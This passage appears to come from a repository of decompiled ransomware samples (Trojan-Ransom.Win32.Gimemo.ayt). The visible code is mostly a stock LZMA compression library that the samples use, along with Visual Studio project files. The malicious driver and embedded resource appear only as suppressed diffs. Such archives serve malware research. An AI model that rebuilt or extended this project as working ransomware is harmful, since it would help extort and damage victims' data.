public uint GetPrice0() => BitEncoder.ProbPrices[(IntPtr) (this.Prob >> 2)];
public uint GetPrice1() => BitEncoder.ProbPrices[(IntPtr) (2048U - this.Prob >> 2)];
}
}
MSIL/Trojan-Ransom/Win32/G/Trojan-Ransom.Win32.Gimemo.ayt-624a52079bf1703bcd3bcc9d2d3716b6126fd05655e25289d19142f9aae02eb5/Compression/RangeCoder/BitTreeDecoder.cs
+66
View File
@@ -0,0 +1,66 @@
// Decompiled with JetBrains decompiler
// Type: SevenZip.Compression.RangeCoder.BitTreeDecoder
// Assembly: P4CTEMP, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 7BE4E538-8555-4C2E-974B-99E556F5462C
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan-Ransom.Win32.Gimemo.ayt-624a52079bf1703bcd3bcc9d2d3716b6126fd05655e25289d19142f9aae02eb5.exe
using System;
namespace SevenZip.Compression.RangeCoder
{
internal struct BitTreeDecoder
{
private BitDecoder[] Models;
private int NumBitLevels;
public BitTreeDecoder(int numBitLevels)
{
this.NumBitLevels = numBitLevels;
this.Models = new BitDecoder[1 << numBitLevels];
}
public void Init()
{
for (uint index = 1; (long) index < (long) (1 << this.NumBitLevels); ++index)
this.Models[(IntPtr) index].Init();
}
public uint Decode(Decoder rangeDecoder)
{
uint index = 1;
for (int numBitLevels = this.NumBitLevels; numBitLevels > 0; --numBitLevels)
index = (index << 1) + this.Models[(IntPtr) index].Decode(rangeDecoder);
return index - (uint) (1 << this.NumBitLevels);
}
public uint ReverseDecode(Decoder rangeDecoder)
{
uint index1 = 1;
uint num1 = 0;
for (int index2 = 0; index2 < this.NumBitLevels; ++index2)
{
uint num2 = this.Models[(IntPtr) index1].Decode(rangeDecoder);
index1 = (index1 << 1) + num2;
num1 |= num2 << index2;
}
return num1;
}
public static uint ReverseDecode(
BitDecoder[] Models,
uint startIndex,
Decoder rangeDecoder,
int NumBitLevels)
{
uint num1 = 1;
uint num2 = 0;
for (int index = 0; index < NumBitLevels; ++index)
{
uint num3 = Models[(IntPtr) (startIndex + num1)].Decode(rangeDecoder);
num1 = (num1 << 1) + num3;
num2 |= num3 << index;
}
return num2;
}
}
}
MSIL/Trojan-Ransom/Win32/G/Trojan-Ransom.Win32.Gimemo.ayt-624a52079bf1703bcd3bcc9d2d3716b6126fd05655e25289d19142f9aae02eb5/Compression/RangeCoder/BitTreeEncoder.cs
+117
View File
@@ -0,0 +1,117 @@
// Decompiled with JetBrains decompiler
// Type: SevenZip.Compression.RangeCoder.BitTreeEncoder
// Assembly: P4CTEMP, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 7BE4E538-8555-4C2E-974B-99E556F5462C
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan-Ransom.Win32.Gimemo.ayt-624a52079bf1703bcd3bcc9d2d3716b6126fd05655e25289d19142f9aae02eb5.exe
using System;
namespace SevenZip.Compression.RangeCoder
{
internal struct BitTreeEncoder
{
private BitEncoder[] Models;
private int NumBitLevels;
public BitTreeEncoder(int numBitLevels)
{
this.NumBitLevels = numBitLevels;
this.Models = new BitEncoder[1 << numBitLevels];
}
public void Init()
{
for (uint index = 1; (long) index < (long) (1 << this.NumBitLevels); ++index)
this.Models[(IntPtr) index].Init();
}
public void Encode(Encoder rangeEncoder, uint symbol)
{
uint index = 1;
int numBitLevels = this.NumBitLevels;
while (numBitLevels > 0)
{
--numBitLevels;
uint symbol1 = symbol >> numBitLevels & 1U;
this.Models[(IntPtr) index].Encode(rangeEncoder, symbol1);
index = index << 1 | symbol1;
}
}
public void ReverseEncode(Encoder rangeEncoder, uint symbol)
{
uint index1 = 1;
for (uint index2 = 0; (long) index2 < (long) this.NumBitLevels; ++index2)
{
uint symbol1 = symbol & 1U;
this.Models[(IntPtr) index1].Encode(rangeEncoder, symbol1);
index1 = index1 << 1 | symbol1;
symbol >>= 1;
}
}
public uint GetPrice(uint symbol)
{
uint price = 0;
uint index = 1;
int numBitLevels = this.NumBitLevels;
while (numBitLevels > 0)
{
--numBitLevels;
uint symbol1 = symbol >> numBitLevels & 1U;
price += this.Models[(IntPtr) index].GetPrice(symbol1);
index = (index << 1) + symbol1;
}
return price;
}
public uint ReverseGetPrice(uint symbol)
{
uint price = 0;
uint index = 1;
for (int numBitLevels = this.NumBitLevels; numBitLevels > 0; --numBitLevels)
{
uint symbol1 = symbol & 1U;
symbol >>= 1;
price += this.Models[(IntPtr) index].GetPrice(symbol1);
index = index << 1 | symbol1;
}
return price;
}
public static uint ReverseGetPrice(
BitEncoder[] Models,
uint startIndex,
int NumBitLevels,
uint symbol)
{
uint price = 0;
uint num = 1;
for (int index = NumBitLevels; index > 0; --index)
{
uint symbol1 = symbol & 1U;
symbol >>= 1;
price += Models[(IntPtr) (startIndex + num)].GetPrice(symbol1);
num = num << 1 | symbol1;
}
return price;
}
public static void ReverseEncode(
BitEncoder[] Models,
uint startIndex,
Encoder rangeEncoder,
int NumBitLevels,
uint symbol)
{
uint num = 1;
for (int index = 0; index < NumBitLevels; ++index)
{
uint symbol1 = symbol & 1U;
Models[(IntPtr) (startIndex + num)].Encode(rangeEncoder, symbol1);
num = num << 1 | symbol1;
symbol >>= 1;
}
}
}
}
MSIL/Trojan-Ransom/Win32/G/Trojan-Ransom.Win32.Gimemo.ayt-624a52079bf1703bcd3bcc9d2d3716b6126fd05655e25289d19142f9aae02eb5/Compression/RangeCoder/Decoder.cs
+95
View File
@@ -0,0 +1,95 @@
// Decompiled with JetBrains decompiler
// Type: SevenZip.Compression.RangeCoder.Decoder
// Assembly: P4CTEMP, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 7BE4E538-8555-4C2E-974B-99E556F5462C
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan-Ransom.Win32.Gimemo.ayt-624a52079bf1703bcd3bcc9d2d3716b6126fd05655e25289d19142f9aae02eb5.exe
using System.IO;
namespace SevenZip.Compression.RangeCoder
{
internal class Decoder
{
public const uint kTopValue = 16777216;
public uint Range;
public uint Code;
public Stream Stream;
public void Init(Stream stream)
{
this.Stream = stream;
this.Code = 0U;
this.Range = uint.MaxValue;
for (int index = 0; index < 5; ++index)
this.Code = this.Code << 8 | (uint) (byte) this.Stream.ReadByte();
}
public void ReleaseStream() => this.Stream = (Stream) null;
public void CloseStream() => this.Stream.Close();
public void Normalize()
{
for (; this.Range < 16777216U; this.Range <<= 8)
this.Code = this.Code << 8 | (uint) (byte) this.Stream.ReadByte();
}
public void Normalize2()
{
if (this.Range >= 16777216U)
return;
this.Code = this.Code << 8 | (uint) (byte) this.Stream.ReadByte();
this.Range <<= 8;
}
public uint GetThreshold(uint total) => this.Code / (this.Range /= total);
public void Decode(uint start, uint size, uint total)
{
this.Code -= start * this.Range;
this.Range *= size;
this.Normalize();
}
public uint DecodeDirectBits(int numTotalBits)
{
uint range = this.Range;
uint num1 = this.Code;
uint num2 = 0;
for (int index = numTotalBits; index > 0; --index)
{
range >>= 1;
uint num3 = num1 - range >> 31;
num1 -= range & num3 - 1U;
num2 = (uint) ((int) num2 << 1 | 1 - (int) num3);
if (range < 16777216U)
{
num1 = num1 << 8 | (uint) (byte) this.Stream.ReadByte();
range <<= 8;
}
}
this.Range = range;
this.Code = num1;
return num2;
}
public uint DecodeBit(uint size0, int numTotalBits)
{
uint num1 = (this.Range >> numTotalBits) * size0;
uint num2;
if (this.Code < num1)
{
num2 = 0U;
this.Range = num1;
}
else
{
num2 = 1U;
this.Code -= num1;
this.Range -= num1;
}
this.Normalize();
return num2;
}
}
}
MSIL/Trojan-Ransom/Win32/G/Trojan-Ransom.Win32.Gimemo.ayt-624a52079bf1703bcd3bcc9d2d3716b6126fd05655e25289d19142f9aae02eb5/Compression/RangeCoder/Encoder.cs
+108
View File
@@ -0,0 +1,108 @@
// Decompiled with JetBrains decompiler
// Type: SevenZip.Compression.RangeCoder.Encoder
// Assembly: P4CTEMP, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 7BE4E538-8555-4C2E-974B-99E556F5462C
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan-Ransom.Win32.Gimemo.ayt-624a52079bf1703bcd3bcc9d2d3716b6126fd05655e25289d19142f9aae02eb5.exe
using System.IO;
namespace SevenZip.Compression.RangeCoder
{
internal class Encoder
{
public const uint kTopValue = 16777216;
private Stream Stream;
public ulong Low;
public uint Range;
private uint _cacheSize;
private byte _cache;
private long StartPosition;
public void SetStream(Stream stream) => this.Stream = stream;
public void ReleaseStream() => this.Stream = (Stream) null;
public void Init()
{
this.StartPosition = this.Stream.Position;
this.Low = 0UL;
this.Range = uint.MaxValue;
this._cacheSize = 1U;
this._cache = (byte) 0;
}
public void FlushData()
{
for (int index = 0; index < 5; ++index)
this.ShiftLow();
}
public void FlushStream() => this.Stream.Flush();
public void CloseStream() => this.Stream.Close();
public void Encode(uint start, uint size, uint total)
{
this.Low += (ulong) (start * (this.Range /= total));
this.Range *= size;
while (this.Range < 16777216U)
{
this.Range <<= 8;
this.ShiftLow();
}
}
public void ShiftLow()
{
if ((uint) this.Low < 4278190080U || (uint) (this.Low >> 32) == 1U)
{
byte num = this._cache;
do
{
this.Stream.WriteByte((byte) ((ulong) num + (this.Low >> 32)));
num = byte.MaxValue;
}
while (--this._cacheSize != 0U);
this._cache = (byte) ((uint) this.Low >> 24);
}
++this._cacheSize;
this.Low = (ulong) ((uint) this.Low << 8);
}
public void EncodeDirectBits(uint v, int numTotalBits)
{
for (int index = numTotalBits - 1; index >= 0; --index)
{
this.Range >>= 1;
if (((int) (v >> index) & 1) == 1)
this.Low += (ulong) this.Range;
if (this.Range < 16777216U)
{
this.Range <<= 8;
this.ShiftLow();
}
}
}
public void EncodeBit(uint size0, int numTotalBits, uint symbol)
{
uint num = (this.Range >> numTotalBits) * size0;
if (symbol == 0U)
{
this.Range = num;
}
else
{
this.Low += (ulong) num;
this.Range -= num;
}
while (this.Range < 16777216U)
{
this.Range <<= 8;
this.ShiftLow();
}
}
public long GetProcessedSizeAdd() => (long) this._cacheSize + this.Stream.Position - this.StartPosition + 4L;
}
}
MSIL/Trojan-Ransom/Win32/G/Trojan-Ransom.Win32.Gimemo.ayt-624a52079bf1703bcd3bcc9d2d3716b6126fd05655e25289d19142f9aae02eb5/DataErrorException.cs
+18
View File
@@ -0,0 +1,18 @@
// Decompiled with JetBrains decompiler
// Type: SevenZip.DataErrorException
// Assembly: P4CTEMP, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 7BE4E538-8555-4C2E-974B-99E556F5462C
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan-Ransom.Win32.Gimemo.ayt-624a52079bf1703bcd3bcc9d2d3716b6126fd05655e25289d19142f9aae02eb5.exe
using System;
namespace SevenZip
{
internal class DataErrorException : ApplicationException
{
public DataErrorException()
: base("Data Error")
{
}
}
}
MSIL/Trojan-Ransom/Win32/G/Trojan-Ransom.Win32.Gimemo.ayt-624a52079bf1703bcd3bcc9d2d3716b6126fd05655e25289d19142f9aae02eb5/ICodeProgress.cs
+13
View File
@@ -0,0 +1,13 @@
// Decompiled with JetBrains decompiler
// Type: SevenZip.ICodeProgress
// Assembly: P4CTEMP, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 7BE4E538-8555-4C2E-974B-99E556F5462C
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan-Ransom.Win32.Gimemo.ayt-624a52079bf1703bcd3bcc9d2d3716b6126fd05655e25289d19142f9aae02eb5.exe
namespace SevenZip
{
public interface ICodeProgress
{
void SetProgress(long inSize, long outSize);
}
}
MSIL/Trojan-Ransom/Win32/G/Trojan-Ransom.Win32.Gimemo.ayt-624a52079bf1703bcd3bcc9d2d3716b6126fd05655e25289d19142f9aae02eb5/ICoder.cs
+20
View File
@@ -0,0 +1,20 @@
// Decompiled with JetBrains decompiler
// Type: SevenZip.ICoder
// Assembly: P4CTEMP, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 7BE4E538-8555-4C2E-974B-99E556F5462C
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan-Ransom.Win32.Gimemo.ayt-624a52079bf1703bcd3bcc9d2d3716b6126fd05655e25289d19142f9aae02eb5.exe
using System.IO;
namespace SevenZip
{
public interface ICoder
{
void Code(
Stream inStream,
Stream outStream,
long inSize,
long outSize,
ICodeProgress progress);
}
}
MSIL/Trojan-Ransom/Win32/G/Trojan-Ransom.Win32.Gimemo.ayt-624a52079bf1703bcd3bcc9d2d3716b6126fd05655e25289d19142f9aae02eb5/ISetCoderProperties.cs
+13
View File
@@ -0,0 +1,13 @@
// Decompiled with JetBrains decompiler
// Type: SevenZip.ISetCoderProperties
// Assembly: P4CTEMP, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 7BE4E538-8555-4C2E-974B-99E556F5462C
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan-Ransom.Win32.Gimemo.ayt-624a52079bf1703bcd3bcc9d2d3716b6126fd05655e25289d19142f9aae02eb5.exe
namespace SevenZip
{
public interface ISetCoderProperties
{
void SetCoderProperties(CoderPropID[] propIDs, object[] properties);
}
}
MSIL/Trojan-Ransom/Win32/G/Trojan-Ransom.Win32.Gimemo.ayt-624a52079bf1703bcd3bcc9d2d3716b6126fd05655e25289d19142f9aae02eb5/ISetDecoderProperties.cs
+13
View File
@@ -0,0 +1,13 @@
// Decompiled with JetBrains decompiler
// Type: SevenZip.ISetDecoderProperties
// Assembly: P4CTEMP, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 7BE4E538-8555-4C2E-974B-99E556F5462C
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan-Ransom.Win32.Gimemo.ayt-624a52079bf1703bcd3bcc9d2d3716b6126fd05655e25289d19142f9aae02eb5.exe
namespace SevenZip
{
public interface ISetDecoderProperties
{
void SetDecoderProperties(byte[] properties);
}
}
MSIL/Trojan-Ransom/Win32/G/Trojan-Ransom.Win32.Gimemo.ayt-624a52079bf1703bcd3bcc9d2d3716b6126fd05655e25289d19142f9aae02eb5/IWriteCoderProperties.cs
+15
View File
@@ -0,0 +1,15 @@
// Decompiled with JetBrains decompiler
// Type: SevenZip.IWriteCoderProperties
// Assembly: P4CTEMP, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 7BE4E538-8555-4C2E-974B-99E556F5462C
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan-Ransom.Win32.Gimemo.ayt-624a52079bf1703bcd3bcc9d2d3716b6126fd05655e25289d19142f9aae02eb5.exe
using System.IO;
namespace SevenZip
{
public interface IWriteCoderProperties
{
void WriteCoderProperties(Stream outStream);
}
}
MSIL/Trojan-Ransom/Win32/G/Trojan-Ransom.Win32.Gimemo.ayt-624a52079bf1703bcd3bcc9d2d3716b6126fd05655e25289d19142f9aae02eb5/InvalidParamException.cs
+18
View File
@@ -0,0 +1,18 @@
// Decompiled with JetBrains decompiler
// Type: SevenZip.InvalidParamException
// Assembly: P4CTEMP, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 7BE4E538-8555-4C2E-974B-99E556F5462C
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan-Ransom.Win32.Gimemo.ayt-624a52079bf1703bcd3bcc9d2d3716b6126fd05655e25289d19142f9aae02eb5.exe
using System;
namespace SevenZip
{
internal class InvalidParamException : ApplicationException
{
public InvalidParamException()
: base("Invalid Parameter")
{
}
}
}
MSIL/Trojan-Ransom/Win32/G/Trojan-Ransom.Win32.Gimemo.ayt-624a52079bf1703bcd3bcc9d2d3716b6126fd05655e25289d19142f9aae02eb5/SysDriver/Driver.cs
+95
View File
File diff suppressed because one or more lines are too long
MSIL/Trojan-Ransom/Win32/G/Trojan-Ransom.Win32.Gimemo.ayt-624a52079bf1703bcd3bcc9d2d3716b6126fd05655e25289d19142f9aae02eb5/Trojan-Ransom.Win32.Gimemo.ayt.csproj
+66
View File
@@ -0,0 +1,66 @@
<?xml version="1.0" encoding="utf-8"?>
<Project DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<!--Project was exported from assembly: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan-Ransom.Win32.Gimemo.ayt-624a52079bf1703bcd3bcc9d2d3716b6126fd05655e25289d19142f9aae02eb5.exe-->
<PropertyGroup>
<Configuration Condition=" '$(Configuration)' == '' ">Debug</Configuration>
<Platform Condition=" '$(Platform)' == '' ">AnyCPU</Platform>
<ProjectGuid>{DD3E6800-B909-442C-AB98-F8DB5B0B2E96}</ProjectGuid>
<OutputType>WinExe</OutputType>
<AssemblyName>P4CTEMP</AssemblyName>
<ApplicationVersion>1.0.0.0</ApplicationVersion>
<RootNamespace>SevenZip</RootNamespace>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Debug|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugSymbols>true</DebugSymbols>
<DebugType>full</DebugType>
<Optimize>false</Optimize>
<OutputPath>bin\Debug\</OutputPath>
<DefineConstants>DEBUG;TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Release|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugType>pdbonly</DebugType>
<Optimize>true</Optimize>
<OutputPath>bin\Release\</OutputPath>
<DefineConstants>TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<ItemGroup>
<Compile Include="DataErrorException.cs" />
<Compile Include="InvalidParamException.cs" />
<Compile Include="ICodeProgress.cs" />
<Compile Include="ICoder.cs" />
<Compile Include="CoderPropID.cs" />
<Compile Include="ISetCoderProperties.cs" />
<Compile Include="IWriteCoderProperties.cs" />
<Compile Include="ISetDecoderProperties.cs" />
<Compile Include="CRC.cs" />
<Compile Include="Buffer\InBuffer.cs" />
<Compile Include="Buffer\OutBuffer.cs" />
<Compile Include="Compression\LZ\IInWindowStream.cs" />
<Compile Include="Compression\LZ\IMatchFinder.cs" />
<Compile Include="Compression\LZ\InWindow.cs" />
<Compile Include="Compression\LZ\BinTree.cs" />
<Compile Include="Compression\LZ\OutWindow.cs" />
<Compile Include="Compression\LZMA\Base.cs" />
<Compile Include="Compression\LZMA\Decoder.cs" />
<Compile Include="Compression\LZMA\Encoder.cs" />
<Compile Include="Compression\LZMA\SevenZipHelper.cs" />
<Compile Include="Compression\RangeCoder\Encoder.cs" />
<Compile Include="Compression\RangeCoder\Decoder.cs" />
<Compile Include="Compression\RangeCoder\BitEncoder.cs" />
<Compile Include="Compression\RangeCoder\BitDecoder.cs" />
<Compile Include="Compression\RangeCoder\BitTreeEncoder.cs" />
<Compile Include="Compression\RangeCoder\BitTreeDecoder.cs" />
<Compile Include="SysDriver\Driver.cs" />
<Compile Include="AssemblyInfo.cs" />
</ItemGroup>
<ItemGroup>
<EmbeddedResource Include="temp.resource" />
</ItemGroup>
<Import Project="$(MSBuildBinPath)\Microsoft.CSharp.targets" />
</Project>
MSIL/Trojan-Ransom/Win32/G/Trojan-Ransom.Win32.Gimemo.ayt-624a52079bf1703bcd3bcc9d2d3716b6126fd05655e25289d19142f9aae02eb5/Trojan-Ransom.Win32.Gimemo.ayt.sln
+20
View File
@@ -0,0 +1,20 @@
Microsoft Visual Studio Solution File, Format Version 9.00
# Visual Studio 2005
Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "P4CTEMP", "Trojan-Ransom.Win32.Gimemo.ayt-624a52079bf1703bcd3bcc9d2d3716b6126fd05655e25289d19142f9aae02eb5.csproj", "{DD3E6800-B909-442C-AB98-F8DB5B0B2E96}"
EndProject
Global
GlobalSection(SolutionConfigurationPlatforms) = preSolution
Debug|Any CPU = Debug|Any CPU
Release|Any CPU = Release|Any CPU
EndGlobalSection
GlobalSection(ProjectConfigurationPlatforms) = postSolution
{DD3E6800-B909-442C-AB98-F8DB5B0B2E96}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
{DD3E6800-B909-442C-AB98-F8DB5B0B2E96}.Debug|Any CPU.Build.0 = Debug|Any CPU
{DD3E6800-B909-442C-AB98-F8DB5B0B2E96}.Release|Any CPU.ActiveCfg = Release|Any CPU
{DD3E6800-B909-442C-AB98-F8DB5B0B2E96}.Release|Any CPU.Build.0 = Release|Any CPU
EndGlobalSection
GlobalSection(SolutionProperties) = preSolution
HideSolutionNode = FALSE
EndGlobalSection
EndGlobal
MSIL/Trojan-Ransom/Win32/G/Trojan-Ransom.Win32.Gimemo.ayt-624a52079bf1703bcd3bcc9d2d3716b6126fd05655e25289d19142f9aae02eb5/temp.resource
+1
View File
File diff suppressed because one or more lines are too long
MSIL/Trojan-Ransom/Win32/G/Trojan-Ransom.Win32.Gimemo.ayt-7cb020d260d835f80919399a58563918f73757689e39ba851e89cc00a05535da/AssemblyInfo.cs
+15
View File
@@ -0,0 +1,15 @@
using System.Reflection;
using System.Runtime.InteropServices;
using System.Security.Permissions;
[assembly: AssemblyCompany("")]
[assembly: AssemblyTrademark("")]
[assembly: AssemblyCopyright("")]
[assembly: AssemblyProduct("")]
[assembly: ComVisible(false)]
[assembly: AssemblyConfiguration("")]
[assembly: AssemblyDescription("")]
[assembly: AssemblyTitle("")]
[assembly: AssemblyFileVersion("1.0.0.0")]
[assembly: AssemblyVersion("1.0.0.0")]
[assembly: SecurityPermission(SecurityAction.RequestMinimum, SkipVerification = true)]
MSIL/Trojan-Ransom/Win32/G/Trojan-Ransom.Win32.Gimemo.ayt-7cb020d260d835f80919399a58563918f73757689e39ba851e89cc00a05535da/Buffer/InBuffer.cs
+63
View File
@@ -0,0 +1,63 @@
// Decompiled with JetBrains decompiler
// Type: SevenZip.Buffer.InBuffer
// Assembly: crypted, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 316F25AB-9DC5-41B1-B1CB-0BB9D97AEA6A
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan-Ransom.Win32.Gimemo.ayt-7cb020d260d835f80919399a58563918f73757689e39ba851e89cc00a05535da.exe
using System;
using System.IO;
namespace SevenZip.Buffer
{
public class InBuffer
{
private byte[] m_Buffer;
private uint m_Pos;
private uint m_Limit;
private uint m_BufferSize;
private Stream m_Stream;
private bool m_StreamWasExhausted;
private ulong m_ProcessedSize;
public InBuffer(uint bufferSize)
{
this.m_Buffer = new byte[(IntPtr) bufferSize];
this.m_BufferSize = bufferSize;
}
public void Init(Stream stream)
{
this.m_Stream = stream;
this.m_ProcessedSize = 0UL;
this.m_Limit = 0U;
this.m_Pos = 0U;
this.m_StreamWasExhausted = false;
}
public bool ReadBlock()
{
if (this.m_StreamWasExhausted)
return false;
this.m_ProcessedSize += (ulong) this.m_Pos;
int num = this.m_Stream.Read(this.m_Buffer, 0, (int) this.m_BufferSize);
this.m_Pos = 0U;
this.m_Limit = (uint) num;
this.m_StreamWasExhausted = num == 0;
return !this.m_StreamWasExhausted;
}
public void ReleaseStream() => this.m_Stream = (Stream) null;
public bool ReadByte(byte b)
{
if (this.m_Pos >= this.m_Limit && !this.ReadBlock())
return false;
b = this.m_Buffer[(IntPtr) this.m_Pos++];
return true;
}
public byte ReadByte() => this.m_Pos >= this.m_Limit && !this.ReadBlock() ? byte.MaxValue : this.m_Buffer[(IntPtr) this.m_Pos++];
public ulong GetProcessedSize() => this.m_ProcessedSize + (ulong) this.m_Pos;
}
}
MSIL/Trojan-Ransom/Win32/G/Trojan-Ransom.Win32.Gimemo.ayt-7cb020d260d835f80919399a58563918f73757689e39ba851e89cc00a05535da/Buffer/OutBuffer.cs
+58
View File
@@ -0,0 +1,58 @@
// Decompiled with JetBrains decompiler
// Type: SevenZip.Buffer.OutBuffer
// Assembly: crypted, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 316F25AB-9DC5-41B1-B1CB-0BB9D97AEA6A
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan-Ransom.Win32.Gimemo.ayt-7cb020d260d835f80919399a58563918f73757689e39ba851e89cc00a05535da.exe
using System;
using System.IO;
namespace SevenZip.Buffer
{
public class OutBuffer
{
private byte[] m_Buffer;
private uint m_Pos;
private uint m_BufferSize;
private Stream m_Stream;
private ulong m_ProcessedSize;
public OutBuffer(uint bufferSize)
{
this.m_Buffer = new byte[(IntPtr) bufferSize];
this.m_BufferSize = bufferSize;
}
public void SetStream(Stream stream) => this.m_Stream = stream;
public void FlushStream() => this.m_Stream.Flush();
public void CloseStream() => this.m_Stream.Close();
public void ReleaseStream() => this.m_Stream = (Stream) null;
public void Init()
{
this.m_ProcessedSize = 0UL;
this.m_Pos = 0U;
}
public void WriteByte(byte b)
{
this.m_Buffer[(IntPtr) this.m_Pos++] = b;
if (this.m_Pos < this.m_BufferSize)
return;
this.FlushData();
}
public void FlushData()
{
if (this.m_Pos == 0U)
return;
this.m_Stream.Write(this.m_Buffer, 0, (int) this.m_Pos);
this.m_Pos = 0U;
}
public ulong GetProcessedSize() => this.m_ProcessedSize + (ulong) this.m_Pos;
}
}
MSIL/Trojan-Ransom/Win32/G/Trojan-Ransom.Win32.Gimemo.ayt-7cb020d260d835f80919399a58563918f73757689e39ba851e89cc00a05535da/CRC.cs
+53
View File
@@ -0,0 +1,53 @@
// Decompiled with JetBrains decompiler
// Type: SevenZip.CRC
// Assembly: crypted, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 316F25AB-9DC5-41B1-B1CB-0BB9D97AEA6A
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan-Ransom.Win32.Gimemo.ayt-7cb020d260d835f80919399a58563918f73757689e39ba851e89cc00a05535da.exe
using System;
namespace SevenZip
{
internal class CRC
{
public static readonly uint[] Table = new uint[256];
private uint _value = uint.MaxValue;
static CRC()
{
for (uint index1 = 0; index1 < 256U; ++index1)
{
uint num = index1;
for (int index2 = 0; index2 < 8; ++index2)
{
if (((int) num & 1) != 0)
num = num >> 1 ^ 3988292384U;
else
num >>= 1;
}
CRC.Table[(IntPtr) index1] = num;
}
}
public void Init() => this._value = uint.MaxValue;
public void UpdateByte(byte b) => this._value = CRC.Table[(int) (byte) this._value ^ (int) b] ^ this._value >> 8;
public void Update(byte[] data, uint offset, uint size)
{
for (uint index = 0; index < size; ++index)
this._value = CRC.Table[(int) (byte) this._value ^ (int) data[(IntPtr) (offset + index)]] ^ this._value >> 8;
}
public uint GetDigest() => this._value ^ uint.MaxValue;
private static uint CalculateDigest(byte[] data, uint offset, uint size)
{
CRC crc = new CRC();
crc.Update(data, offset, size);
return crc.GetDigest();
}
private static bool VerifyDigest(uint digest, byte[] data, uint offset, uint size) => (int) CRC.CalculateDigest(data, offset, size) == (int) digest;
}
}
MSIL/Trojan-Ransom/Win32/G/Trojan-Ransom.Win32.Gimemo.ayt-7cb020d260d835f80919399a58563918f73757689e39ba851e89cc00a05535da/CoderPropID.cs
+27
View File
@@ -0,0 +1,27 @@
// Decompiled with JetBrains decompiler
// Type: SevenZip.CoderPropID
// Assembly: crypted, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 316F25AB-9DC5-41B1-B1CB-0BB9D97AEA6A
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan-Ransom.Win32.Gimemo.ayt-7cb020d260d835f80919399a58563918f73757689e39ba851e89cc00a05535da.exe
namespace SevenZip
{
public enum CoderPropID
{
DefaultProp,
DictionarySize,
UsedMemorySize,
Order,
BlockSize,
PosStateBits,
LitContextBits,
LitPosBits,
NumFastBytes,
MatchFinder,
MatchFinderCycles,
NumPasses,
Algorithm,
NumThreads,
EndMarker,
}
}
MSIL/Trojan-Ransom/Win32/G/Trojan-Ransom.Win32.Gimemo.ayt-7cb020d260d835f80919399a58563918f73757689e39ba851e89cc00a05535da/Compression/LZ/BinTree.cs
+370
View File
@@ -0,0 +1,370 @@
// Decompiled with JetBrains decompiler
// Type: SevenZip.Compression.LZ.BinTree
// Assembly: crypted, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 316F25AB-9DC5-41B1-B1CB-0BB9D97AEA6A
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan-Ransom.Win32.Gimemo.ayt-7cb020d260d835f80919399a58563918f73757689e39ba851e89cc00a05535da.exe
using System;
using System.IO;
namespace SevenZip.Compression.LZ
{
public class BinTree : InWindow, IMatchFinder, IInWindowStream
{
private const uint kHash2Size = 1024;
private const uint kHash3Size = 65536;
private const uint kBT2HashSize = 65536;
private const uint kStartMaxLen = 1;
private const uint kHash3Offset = 1024;
private const uint kEmptyHashValue = 0;
private const uint kMaxValForNormalize = 2147483647;
private uint _cyclicBufferPos;
private uint _cyclicBufferSize;
private uint _matchMaxLen;
private uint[] _son;
private uint[] _hash;
private uint _cutValue = (uint) byte.MaxValue;
private uint _hashMask;
private uint _hashSizeSum;
private bool HASH_ARRAY = true;
private uint kNumHashDirectBytes;
private uint kMinMatchCheck = 4;
private uint kFixHashSize = 66560;
public void SetType(int numHashBytes)
{
this.HASH_ARRAY = numHashBytes > 2;
if (this.HASH_ARRAY)
{
this.kNumHashDirectBytes = 0U;
this.kMinMatchCheck = 4U;
this.kFixHashSize = 66560U;
}
else
{
this.kNumHashDirectBytes = 2U;
